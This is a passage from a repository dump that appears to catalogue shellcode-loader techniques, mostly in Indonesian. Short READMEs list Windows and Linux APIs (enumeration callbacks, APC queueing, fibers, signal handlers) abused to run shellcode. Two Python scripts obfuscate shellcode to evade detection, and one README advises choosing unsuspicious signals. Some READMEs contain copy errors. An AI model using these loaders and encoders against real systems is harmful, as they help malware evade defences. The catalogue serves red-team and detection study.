14 | 
15 | - [MSDN PageSetupDlg](https://docs.microsoft.com/en-us/previous-versions/windows/desktop/legacy/ms646937(v=vs.85))
16 | - [MSDN structure PAGESETUPDLGA](https://docs.microsoft.com/en-us/windows/win32/api/commdlg/ns-commdlg-pagesetupdlga)
17 | - [MSDN structure PAGESETUPDLGW](https://docs.microsoft.com/en-us/windows/win32/api/commdlg/ns-commdlg-pagesetupdlgw)


--------------------------------------------------------------------------------
/linux/execution/event/sigaction/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Executing shellcode by raising signal (with sigaction).
 4 | 
 5 | ### Overview
 6 | 
 7 | Daftarkan shellcode ke sebuah signal tertentu dengan `sigaction` dan eksekusi dengan memicu signal yang sesuai.
 8 | 
 9 | Gunakan signal yang umum terjadi seperti: SIGUSR1, SIGUSR2, SIGCHLD. Hindari memicu signal mencurigakan seperti SIGSEGV, SIGILL, dsb.
10 | 
11 | ```c++
12 | #include <signal.h>
13 | 
14 | int sigaction(int signum, const struct sigaction *act, struct sigaction * oldact);
15 | ```
16 | 
17 | ### Reference
18 | 
19 | - [Man 2](https://man7.org/linux/man-pages/man2/sigaction.2.html)


--------------------------------------------------------------------------------
/windows/execution/callback/EnumSystemLanguageGroups/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `EnumSystemLanguageGroups`.
 8 | 
 9 | ```c++
10 | BOOL EnumSystemLanguageGroupsA (LANGUAGEGROUP_ENUMPROCA lpLanguageGroupEnumProc, DWORD dwFlags, LONG_PTR lParam);
11 | 
12 | BOOL EnumSystemLanguageGroupsW (LANGUAGEGROUP_ENUMPROCW lpLanguageGroupEnumProc, DWORD dwFlags, LONG_PTR lParam);
13 | ```
14 | 
15 | ### Reference 
16 | 
17 | - [MSDN EnumSystemLanguageGroups](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createremotethread)


--------------------------------------------------------------------------------
/windows/execution/callback/EnumWindowStations/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `EnumWindowStations`.
 8 | 
 9 | ```c++
10 | BOOL EnumWindowStationsA (WINSTAENUMPROCA lpEnumFunc, LPARAM lParam);
11 | 
12 | BOOL EnumWindowStationsW (WINSTAENUMPROCW lpEnumFunc, LPARAM lParam);
13 | ```
14 | 
15 | ### Reference 
16 | 
17 | - [MSDN EnumWindowStationsA](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-enumwindowstationsa)
18 | - [MSDN EnumWindowStationsW](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-enumwindowstationsw)


--------------------------------------------------------------------------------
/windows/execution/callback/NotifyUnicastIpAddressChange/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `NotifyUnicastIpAddressChange`.
 8 | 
 9 | ```c++
10 | IPHLPAPI_DLL_LINKAGE _NETIOAPI_SUCCESS_ NETIOAPI_API 
11 | NotifyUnicastIpAddressChange (ADDRESS_FAMILY Family, PUNICAST_IPADDRESS_CHANGE_CALLBACK Callback, PVOID CallerContext, BOOLEAN InitialNotification, HANDLE *NotificationHandle);
12 | ```
13 | 
14 | ### Reference 
15 | 
16 | - [MSDN NotifyUnicastIpAddressChange](https://docs.microsoft.com/en-us/windows/win32/api/netioapi/nf-netioapi-notifyunicastipaddresschange)


--------------------------------------------------------------------------------
/windows/execution/callback/EnumSystemLocales/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `EnumSystemLocales`.
 8 | 
 9 | ```c++
10 | BOOL EnumSystemLocalesA (LOCALE_ENUMPROCA lpLocaleEnumProc, DWORD dwFlags);
11 | 
12 | BOOL EnumSystemLocalesW (LOCALE_ENUMPROCW lpLocaleEnumProc, DWORD dwFlags);
13 | ```
14 | 
15 | ### Reference 
16 | 
17 | - [MSDN EnumSystemLocalesA](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumsystemlocalesa)
18 | - [MSDN EnumSystemLocalesW](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumsystemlocalesw)


--------------------------------------------------------------------------------
/windows/execution/event/QueueUserAPC/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Executing shellcode by queueing into APC (Asynchronous Procedure Call).
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `QueueUserAPC`.
 8 | 
 9 | ```c++
10 | DWORD QueueUserAPC(PAPCFUNC pfnAPC, HANDLE hThread, ULONG_PTR dwData);
11 | 
12 | NTSTATUS NtTestAlert();
13 | ```
14 | 
15 | ### Reference 
16 | 
17 | - [MSDN QueueUserAPC](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-queueuserapc)
18 | - [NTInternals NtTestAlert](http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FAPC%2FNtTestAlert.html)


--------------------------------------------------------------------------------
/windows/writing/encryption/block/hierocrypt3/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Shellcode encryption
 4 | 
 5 | ### Overview
 6 | 
 7 | Enkripsi `Hierocrypt3` dengan implementasi pribadi tanpa menggunakan API pihak ketiga.
 8 | 
 9 | `Hierocrypt3` memiliki beberapa opsi ukuran key, namun dalam contoh implementasi akan digunakan ukuran key 128-bit.
10 | 
11 | ### References
12 | 
13 | - [Reversing.ID Hierocrypt3 Reference](https://github.com/ReversingID/Crypto-Reference/tree/master/References/Modern/Block-Cipher/Hierocrypt-3)
14 | - [Reversing.ID Hierocrypt3 Code](https://github.com/ReversingID/Crypto-Reference/blob/master/Codes/Cipher/Block/Hierocrypt3/code.c)


--------------------------------------------------------------------------------
/windows/writing/custom/xor-pair/c++/generate.py:
--------------------------------------------------------------------------------
 1 | # read shellcode from `shellcode.bin` and 
 2 | # generate the encoded shellcode
 3 | 
 4 | with open("shellcode.bin", "rb") as f:
 5 |     shcode = f.read()
 6 | shlen = len(shcode)
 7 | 
 8 | if shlen % 2 == 1:
 9 |     shcode += b"\x90"
10 |     shlen += 1
11 | 
12 | # encode shellcode
13 | enc_shcode = []
14 | idx = 0
15 | while idx < shlen:
16 |     key = shcode[idx]
17 | 
18 |     enc_shcode.append(key)
19 |     enc_shcode.append(key ^ shcode[idx + 1])
20 |     
21 |     idx += 2
22 | 
23 | # print as C-array
24 | print("{ ", end='')
25 | print(",".join("0x{:02x}".format(c) for c in enc_shcode), end='')
26 | print(" }")


--------------------------------------------------------------------------------
/windows/execution/callback/EnumDateFormats/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `EnumDateFormats`.
 8 | 
 9 | ```c++
10 | BOOL EnumDateFormatsA (DATEFMT_ENUMPROCA lpDateFmtEnumProc, LCID Locale, DWORD dwFlags);
11 | 
12 | BOOL EnumDateFormatsW (DATEFMT_ENUMPROCW lpDateFmtEnumProc, LCID Locale, DWORD dwFlags);
13 | ```
14 | 
15 | ### Reference 
16 | 
17 | - [MSDN EnumDateFormatsA](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumdateformatsa)
18 | - [MSDN EnumDateFormatsW](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumdateformatsw)


--------------------------------------------------------------------------------
/windows/execution/callback/EnumTimeFormats/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `EnumTimeFormats`.
 8 | 
 9 | ```c++
10 | BOOL EnumTimeFormatsA (TIMEFMT_ENUMPROCA lpTimeFmtEnumProc, LCID Locale, DWORD dwFlags);
11 | 
12 | BOOL EnumTimeFormatsW (TIMEFMT_ENUMPROCW lpTimeFmtEnumProc, LCID Locale, DWORD dwFlags);
13 | ```
14 | 
15 | ### Reference 
16 | 
17 | - [MSDN EnumTimeFormatsA](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumtimeformatsa)
18 | - [MSDN EnumTimeFormatsW](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumtimeformatsw)


--------------------------------------------------------------------------------
/windows/execution/fiber/CreateFiberEx/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Executing shellcode as a fiber.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `CreateFiberEx`.
 8 | 
 9 | ```c++
10 | LPVOID CreateFiberEx (SIZE_T dwStackCommitSize, SIZE_T dwStackReserveSize, LPFIBER_START_ROUTINE lpStartAddress, LPVOID lpParameter);
11 | 
12 | LPVOID ConvertThreadToFiber(LPVOID lpParameter);
13 | ```
14 | 
15 | ### Reference 
16 | 
17 | - [MSDN CreateFiberEx](https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-createfiberex)
18 | - [MSDN ConvertThreadToFiber](https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-convertthreadtofiber)


--------------------------------------------------------------------------------
/windows/execution/callback/mmioInstallIOProc/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `mmioInstallIOProc`.
 8 | 
 9 | ```c++
10 | LPMMIOPROC mmioInstallIOProc (FOURCC fccIOProc, LPMMIOPROC pIOProc, DWORD dwFlags);
11 | 
12 | MCIERROR mciSendString (LPCTSTR lpszCommand, LPTSTR lpszReturnString, UINT cchReturn, HANDLE hwndCallback);
13 | ```
14 | 
15 | ### Reference 
16 | 
17 | - [MSDN mmioInstallIOProc](https://docs.microsoft.com/en-us/windows/win32/api/mmiscapi/nf-mmiscapi-mmioinstallioproc)
18 | - [MSDN mciSendString](https://docs.microsoft.com/en-us/previous-versions//dd757161(v=vs.85))


--------------------------------------------------------------------------------
/windows/execution/callback/EnumSystemCodePages/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `EnumSystemCodePages`.
 8 | 
 9 | ```c++
10 | BOOL EnumSystemCodePagesA (CODEPAGE_ENUMPROCA lpCodePageEnumProc, DWORD dwFlags);
11 | 
12 | BOOL EnumSystemCodePagesW (CODEPAGE_ENUMPROCW lpCodePageEnumProc, DWORD dwFlags);
13 | ```
14 | 
15 | ### Reference 
16 | 
17 | - [MSDN EnumSystemCodePagesA](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumsystemcodepagesa)
18 | - [MSDN EnumSystemCodePagesW](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumsystemcodepagesw)


--------------------------------------------------------------------------------
/windows/writing/custom/printable/c++/generate.py:
--------------------------------------------------------------------------------
 1 | # read shellcode from `shellcode.bin` and
 2 | # generate the encoded shellcode 
 3 | 
 4 | import random
 5 | 
 6 | with open("shellcode.bin", "rb") as f:
 7 |     shcode = f.read()
 8 | shlen = len(shcode)
 9 | 
10 | #encode shellcode
11 | enc_shcode = []
12 | 
13 | for B in shcode:
14 |     L, R = (B >> 4), (B & 0x0F)
15 | 
16 |     n = random.randrange(2, 6)
17 |     enc_shcode.append((n << 4 | L) & 0xFF)
18 | 
19 |     n = random.randrange(2, 6)
20 |     enc_shcode.append((n << 4 | R) & 0xFF)
21 | 
22 | # print as C-array
23 | print("{ ", end='')
24 | print(",".join("0x{:02x}".format(c) for c in enc_shcode), end='')
25 | print(" }")


--------------------------------------------------------------------------------
/windows/execution/callback/SymEnumProcesses/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `SymEnumProcesses`.
 8 | 
 9 | ```c++
10 | BOOL IMAGEAPI SymEnumProcesses (PSYM_ENUMPROCESSES_CALLBACK EnumProcessesCallback, PVOID UserContext);
11 | 
12 | BOOL IMAGEAPI SymInitialize (HANDLE hProcess, PCSTR UserSearchPath, BOOL fInvadeProcess);
13 | ```
14 | 
15 | ### Reference 
16 | 
17 | - [MSDN SymEnumProcesses](https://docs.microsoft.com/en-us/windows/win32/api/dbghelp/nf-dbghelp-symenumprocesses)
18 | - [MSDN SymInitialize](https://docs.microsoft.com/en-us/windows/win32/api/dbghelp/nf-dbghelp-syminitialize)


--------------------------------------------------------------------------------
/linux/allocation/pvalloc/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Allocate memory for executing shellcode later.
 4 | 
 5 | ### Overview
 6 | 
 7 | Alokasi menggunakan `pvalloc`. Fungsi `pvalloc` bekerja dengan mengalokasikan block memory yang dimulai dari alamat kelipatan page.
 8 | 
 9 | Fungsi `pvalloc` mirip dengan `valloc` (lib `stdlib.h`). Perbedaannya adalah `pvalloc` akan melakukan pembulatan size menjadi kelipatan dari ukuran page.
10 | 
11 | Sebagai catatan, `pvalloc` berstatus legacy dan digantikan dengan `memalign`.
12 | 
13 | ```c++
14 | #include <malloc.h>
15 | 
16 | void * pvalloc(size_t size);
17 | ```
18 | 
19 | ### Reference
20 | 
21 | - [Man 3](https://linux.die.net/man/3/pvalloc)


--------------------------------------------------------------------------------
/windows/execution/callback/CallWindowProc/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `CallWindowProc`.
 8 | 
 9 | ```c++
10 | LRESULT CallWindowProcA (WNDPROC lpPrevWndFunc, HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam);
11 | 
12 | LRESULT CallWindowProcW (WNDPROC lpPrevWndFunc, HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam);
13 | ```
14 | 
15 | ### Reference 
16 | 
17 | - [MSDN CallWindowProcA](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-callwindowproca)
18 | - [MSDN CallWindowProcW](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-callwindowprocw)


--------------------------------------------------------------------------------
/windows/execution/callback/EnumDateFormatsEx/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `EnumDateFormatsEx`.
 8 | 
 9 | ```c++
10 | BOOL EnumDateFormatsExA (DATEFMT_ENUMPROCEXA lpDateFmtEnumProcEx, LCID Locale, DWORD dwFlags);
11 | 
12 | BOOL EnumDateFormatsExW (DATEFMT_ENUMPROCEXW lpDateFmtEnumProcEx, LCID Locale, DWORD dwFlags);
13 | ```
14 | 
15 | ### Reference 
16 | 
17 | - [MSDN EnumDateFormatsExA](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumdateformatsexa)
18 | - [MSDN EnumDateFormatsExW](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumdateformatsexw)


--------------------------------------------------------------------------------
/windows/execution/callback/EnumUILanguages/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `EnumUILanguages`.
 8 | 
 9 | ```c++
10 | BOOL EnumUILanguagesA (UILANGUAGE_ENUMPROCA lpUILanguageEnumProc, DWORD dwFlags, LONG_PTR lParam);
11 | 
12 | BOOL EnumUILanguagesW (UILANGUAGE_ENUMPROCW lpUILanguageEnumProc, DWORD dwFlags, LONG_PTR lParam);
13 | ```
14 | 
15 | ### Reference 
16 | 
17 | - [MSDN EnumUILanguagesA](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumuilanguagesa)
18 | - [MSDN EnumUILanguagesW](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumuilanguagesw)


--------------------------------------------------------------------------------
/linux/allocation/memalign/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Allocate memory for executing shellcode later.
 4 | 
 5 | ### Overview
 6 | 
 7 | Alokasi menggunakan `memalign`. Fungsi `pvalloc` bekerja dengan mengalokasikan block memory yang dimulai dari alamat kelipatan page.
 8 | 
 9 | Fungsi `pvalloc` mirip dengan `valloc` (lib `stdlib.h`). Perbedaannya adalah `pvalloc` akan melakukan pembulatan size menjadi kelipatan dari ukuran page.
10 | 
11 | Sebagai catatan, `pvalloc` berstatus legacy dan digantikan dengan `memalign`.
12 | 
13 | ```c++
14 | #include <malloc.h>
15 | 
16 | void * pvalloc(size_t size);
17 | ```
18 | 
19 | ### Reference
20 | 
21 | - [Man 3](https://linux.die.net/man/3/pvalloc)


--------------------------------------------------------------------------------
/windows/execution/callback/NotifyIpInterfaceChange/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `NotifyIpInterfaceChange`.
 8 | 
 9 | Fungsi ini tersedia untuk Windows Vista dan versi selanjutnya.
10 | 
11 | ```c++
12 | IPHLPAPI_DLL_LINKAGE _NETIOAPI_SUCCESS_ NETIOAPI_API 
13 | NotifyIpInterfaceChange (ADDRESS_FAMILY Family, PIPINTERFACE_CHANGE_CALLBACK Callback, PVOID CallerContext, BOOLEAN InitialNotification, HANDLE *NotificationHandle);
14 | ```
15 | 
16 | ### Reference 
17 | 
18 | - [MSDN NotifyIpInterfaceChange](https://docs.microsoft.com/en-us/windows/win32/api/netioapi/nf-netioapi-notifyipinterfacechange)


--------------------------------------------------------------------------------
/windows/execution/callback/PropertySheet/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `PropertySheet`.
 8 | 
 9 | ```c++
10 | INT_PTR PropertySheetA (LPCPROPSHEETHEADERA header);
11 | 
12 | INT_PTR PropertySheetW (LPCPROPSHEETHEADERW header);
13 | ```
14 | 
15 | ### Reference 
16 | 
17 | - [MSDN PropertySheetA](https://docs.microsoft.com/en-us/windows/win32/api/prsht/nf-prsht-propertysheeta)
18 | - [MSDN PropertySheetW](https://docs.microsoft.com/en-us/windows/win32/api/prsht/nf-prsht-propertysheetw)
19 | - [MSDN structure PROPSHEETHEADER](https://docs.microsoft.com/en-us/windows/win32/controls/pss-propsheetheader)


--------------------------------------------------------------------------------
/windows/execution/callback/EnumCalendarInfo/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `EnumCalendarInfo`.
 8 | 
 9 | ```c++
10 | BOOL EnumCalendarInfoA (CALINFO_ENUMPROCA lpCalInfoEnumProc, LCID Locale, CALID Calendar, CALTYPE CalType);
11 | 
12 | BOOL EnumCalendarInfoW (CALINFO_ENUMPROCW lpCalInfoEnumProc, LCID Locale, CALID Calendar, CALTYPE CalType);
13 | ```
14 | 
15 | ### Reference 
16 | 
17 | - [MSDN EnumCalendarInfoA](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumcalendarinfoa)
18 | - [MSDN EnumCalendarInfoW](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumcalendarinfow)


--------------------------------------------------------------------------------
/windows/writing/custom/xor-lfsr/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Transform the shellcode with custom algorithm.
 4 | 
 5 | ### Overview
 6 | 
 7 | Melakukan operasi XOR terhadap shellcode dengan sebuah nilai yang dihasilkan dari `LFSR (Linear Feedback Shift Register)`. Rangkaian byte yang dihasilkan dari `LFSR` merupakan nilai pseudo-random, sehingga setiap byte shellcode akan di-XOR dengan nilai yang berbeda.
 8 | 
 9 | `LFSR` menggunakan sebuah nilai (`seed`), yang dapat berupa sembarang byte. Dalam hal ini, seed dapat berupa sebuah byte yang secara khusus diberikan, atau dapat pula merupakan byte pertama shellcode.
10 | 
11 | Pada contoh ini, shellcode akan disimpan dengan format berikut: `[Seed] [Encoded Shellcode]`.


--------------------------------------------------------------------------------
/linux/execution/thread/pthread_create/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Executing shellcode as a thread.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `pthread_create` and tunggu hingga eksekusi tuntas dengan `pthread_join`.
 8 | 
 9 | ```c++
10 | #include <pthread.h>
11 | 
12 | typedef void* (*entrypoint_t)(void*);
13 | 
14 | int pthread_create(pthread_t * thread, const pthread_attr_t * attr, entrypoint_t start_routine, void * arg);
15 | 
16 | int pthread_join(pthread_t thread, void ** retval);
17 | ```
18 | 
19 | ### Reference
20 | 
21 | - [Man 3 pthread_create](https://man7.org/linux/man-pages/man3/pthread_create.3.html)
22 | - [Man 3 pthread_join](https://man7.org/linux/man-pages/man3/pthread_join.3.html)


--------------------------------------------------------------------------------
/windows/execution/callback/EnumCalendarInfoEx/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `EnumCalendarInfoEx`.
 8 | 
 9 | ```c++
10 | BOOL EnumCalendarInfoExA (CALINFO_ENUMPROCEXA lpCalInfoEnumProcEx, LCID Locale, CALID Calendar, CALTYPE CalType);
11 | 
12 | BOOL EnumCalendarInfoExW (CALINFO_ENUMPROCEXA lpCalInfoEnumProcEx, LCID Locale, CALID Calendar, CALTYPE CalType);
13 | ```
14 | 
15 | ### Reference 
16 | 
17 | - [MSDN EnumCalendarInfoExA](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumcalendarinfoexa)
18 | - [MSDN EnumCalendarInfoExW](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumcalendarinfoexw)


--------------------------------------------------------------------------------
/windows/execution/event/NtQueueApcThreadEx/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Executing shellcode by queueing into APC (Asynchronous Procedure Call).
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `NtQueueApcThreadEx`.
 8 | 
 9 | ```c++
10 | NTSTATUS
11 | NtQueryApcThreadEx (HANDLE ThreadHandle, USER_APC_OPTION UserApcOption, PPS_APC_ROUTINE ApcRoutine, PVOID SystemArgument1, PVOID SystemArgument2, PVOID SystemArgument3);
12 | 
13 | NTSTATUS NtTestAlert();
14 | ```
15 | 
16 | ### Reference 
17 | 
18 | - [NTInternals NtTestAlert](http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FAPC%2FNtTestAlert.html)
19 | - [BLOG APC Series: User APC API](https://repnz.github.io/posts/apc/user-apc/)


--------------------------------------------------------------------------------
/linux/execution/event/atexit/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Executing shellcode at process exit.
 4 | 
 5 | ### Overview
 6 | 
 7 | Daftarkan shellcode dengan `atexit` sehingga eksekusi secara otomatis tepat sebelum process berakhir.
 8 | 
 9 | `atexit` adalah handler yang digunakan untuk melakukan cleanup (pembersihan resource), atau terminasi segala aktivitas lain. Fungsi ini adalah fungsi standard di standard library C sehingga dapat pula diterapkan pada platform lain.
10 | 
11 | ```c++
12 | #include <stdlib.h>
13 | 
14 | int atexit(void (*func)(void));
15 | ```
16 | 
17 | ### Reference
18 | 
19 | - [Linux Man 3](https://man7.org/linux/man-pages/man3/atexit.3.html)
20 | - [C++ Reference](http://en.cppreference.com/w/c/program/atexit)


--------------------------------------------------------------------------------
/windows/execution/callback/DrawState/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `DrawState`.
 8 | 
 9 | ```c++
10 | BOOL DrawStateA (HDC hdc, HBRUSH hbrFore, DRAWSTATEPROC qfnCallBack, LPARAM lData, WPARAM wData, int x, int y, int cx, int cy, UINT uFlags);
11 | 
12 | BOOL DrawStateW (HDC hdc, HBRUSH hbrFore, DRAWSTATEPROC qfnCallBack, LPARAM lData, WPARAM wData, int x, int y, int cx, int cy, UINT uFlags);
13 | ```
14 | 
15 | ### Reference 
16 | 
17 | - [MSDN DrawStateA](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-drawstatea)
18 | - [MSDN DrawStateW](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-drawstatew)


--------------------------------------------------------------------------------
/windows/execution/callback/GrayString/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `GrayString`.
 8 | 
 9 | ```c++
10 | BOOL GrayStringA (HDC hDC, HBRUSH hBrush, GRAYSTRINGPROC lpOutputFunc, LPARAM lpData, int nCount, int X, int Y, int nWidth, int nHeight);
11 | 
12 | BOOL GrayStringW (HDC hDC, HBRUSH hBrush, GRAYSTRINGPROC lpOutputFunc, LPARAM lpData, int nCount, int X, int Y, int nWidth, int nHeight);
13 | ```
14 | 
15 | ### Reference 
16 | 
17 | - [MSDN GrayStringA](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-graystringa)
18 | - [MSDN GrayStringW](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-graystringw)


--------------------------------------------------------------------------------
/windows/execution/callback/mciSetYieldProc/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `mciSetYieldProc`.
 8 | 
 9 | Shellcode akan dipanggil secara berkala (periodik) ketika MCI device menerima flag MCI_WAIT.
10 | 
11 | ```c++
12 | UINT mciSetYieldProc (MCIDEVICEID IDDevice, YIELDPROC yp, DWORD dwYieldData);
13 | 
14 | MCIERROR mciSendCommand (MCIDEVICEID IDDevice, UINT uMsg, DWORD_PTR fdwCommand, DWORD_PTR dwParam);
15 | ```
16 | 
17 | ### Reference 
18 | 
19 | - [MSDN mciSetYieldProc](https://docs.microsoft.com/en-us/previous-versions/dd757163(v=vs.85))
20 | - [MSDN mciSendCommand](https://docs.microsoft.com/en-us/previous-versions//dd757160(v=vs.85))


--------------------------------------------------------------------------------
/windows/execution/fiber/FlsAlloc/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Executing shellcode as a fiber.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `FlsAlloc`.
 8 | 
 9 | `FlsAlloc` digunakan untuk mengalokasikan `FLS (Fiber Local Storage`) index dan dapat digunakan untuk menyimpan dan mengambil kembali data secara local terhadap Fiber.
10 | 
11 | ```c++
12 | DWORD FlsAlloc (PFLS_CALLBACK_FUNCTION lpCallback);
13 | 
14 | BOOL FlsSetValue (DWORD dwFlsIndex, PVOID lpFlsData);
15 | ```
16 | 
17 | ### Reference 
18 | 
19 | - [MSDN FlsAlloc](https://docs.microsoft.com/fr-fr/windows/win32/api/fibersapi/nf-fibersapi-flsalloc)
20 | - [MSDN FlsSetValue](https://docs.microsoft.com/en-us/windows/win32/api/fibersapi/nf-fibersapi-flssetvalue)


--------------------------------------------------------------------------------
/linux/execution/callback/nftw/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `nftw` (glibc).
 8 | 
 9 | Fungsi `nftw` adalah fungsi POSIX yang digunakan untuk menelusuri file yang ada pada sebuah direktori. Callback akan dipanggil untuk setiap file yang ditemukan.
10 | 
11 | Fungsi `nftw` adalah fungsi pengganti ftw yang saat ini berstatus deprecated.
12 | 
13 | ```c++
14 | #include <ftw.h>
15 | 
16 | typedef int (*callback_t)(const char *, const struct stat *, int, struct FTW *);
17 | 
18 | int nftw(const char * dirpath, callback_t callback, int openfd, int flags);
19 | ```
20 | 
21 | ### Reference
22 | 
23 | - [Man 3](https://man7.org/linux/man-pages/man3/nftw.3.html)


--------------------------------------------------------------------------------
/windows/execution/callback/EnumFonts/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `EnumFonts`.
 8 | 
 9 | ```c++
10 | int EnumFontsA (HDC hdc, LPCSTR lpLogfont, FONTENUMPROCA lpProc, LPARAM lParam);
11 | 
